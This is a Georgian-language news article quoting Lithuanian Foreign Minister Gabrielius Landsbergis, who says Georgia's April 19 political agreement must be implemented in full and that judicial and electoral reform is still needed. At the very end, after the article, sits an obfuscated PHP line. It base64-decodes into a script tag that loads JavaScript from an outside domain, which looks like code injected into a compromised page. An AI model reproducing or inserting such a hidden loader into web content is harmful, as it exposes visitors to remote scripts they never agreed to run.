celsiusi
ავერსი შნაიდერი
19 აპრილის შეთანხმება უნდა იყოს განხორციელებული ყოველგვარი გადახვევის გარეშე, მთელი სისრულით. უკიდურესად მნიშვნელოვანია არსებული პოლიტიკური კრიზისის სრულად მოგვარება, რათა ქვეყანას ჰქონდეს სრულად ფუნქციონირებადი პარლამენტი, სადაც წარმოდგენილი იქნება საქართველო მოქალაქეებიის სრული მანდატი, - ამის შესახებ ლიეტუვის საგარეო საქმეთა მინისტრმა გაბრიელიუს ლანდსბერგისმა საქართველოში თავისი ვიზიტის შეჯამებისას ჟურნალისტებთან განაცხადა.
 
მისივე თქმით, შეთანხმება მხარეებს შორის ფინიშის ხაზი არ არის. როგორც ლიეტუვის პირველმა დიპლომატმა აღნიშნა, შეთანხმების დოკუმენტზე ხელმოწერა მნიშვნელოვანი წინგადადგმული ნაბიჯია, თუმცა ჯერ კიდევ ბევრია გასაკეთებელი პოლიტიზირებული მართლმსაჯულების საკითხის მოგვარების, სასამართლო და საარჩევნო რეფორმების გატარებისთვის.
 
„მინდა ღიად განვაცხადო, როგორც საქართველოს ჭეშმარიტმა მეგობარმა, რომ უკიდურესად მნიშვნელოვანია არსებული პოლიტიკური კრიზისის სრულად მოგვარება, რათა ქვეყანას გააჩნდეს სრულად ფუნქციონირებადი პარლამენტი, სადაც წარმოდგენილი იქნება საქართველოს მოქალაქეების სრული მანდატი. ევროკავშირმა საქართველოს უპრეცედენტო დახმარების ხელი გამოუწოდა როგორც ფინანსური, ასევე პოლიტიკური კუთხით. პოლიტიკური შეთანხმება ევროპული საბჭოს პრეზიდენტის შარლ მიშელის შუამდგომლობით შედგა და ჩვენ გვსურს შევაქოთ ყველა პოლიტიკური პარტია, რომელმაც ხელი მოაწერა ამ შეთანხმებას. ეს ცხადყოფს, რომ ქვეყანაში მართლაც აღებულია ის პასუხისმგებლობა, რომელიც გულისხმობს საერთო კურსისკენ სვლას. თუმცა, შეთანხმება ფინიშის ხაზი არ არის, შეთანხმების ხელმოწერა არის ძალიან მნიშვნელოვანი პირველი ნაბიჯი, მაგრამ სხვა ნაბიჯები, რომლებიც უკავშირდება ისეთ საკითხებს, როგორიც არის პოლიტიზირებული მართლმსაჯულების მოგვარება, ამბიციური სასამართლო და საარჩევნო რეფორმები, აგრეთვე, ძალთა გადანაწილება პარლამენტში, ეს არის ის საკითხები, რომლებიც უნდა მოგვარდეს.
 
ნება მომეცით ნათლად გავუსვა ხაზი იმას, რომ 19 აპრილის შეთანხმება უნდა იყოს განხორციელებული ყოველგვარი გადახვევის გარეშე, მთელი სისრულით,“- განაცხადა ლიეტუვის საგარეო საქმეთა მინისტრმა.
1039
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");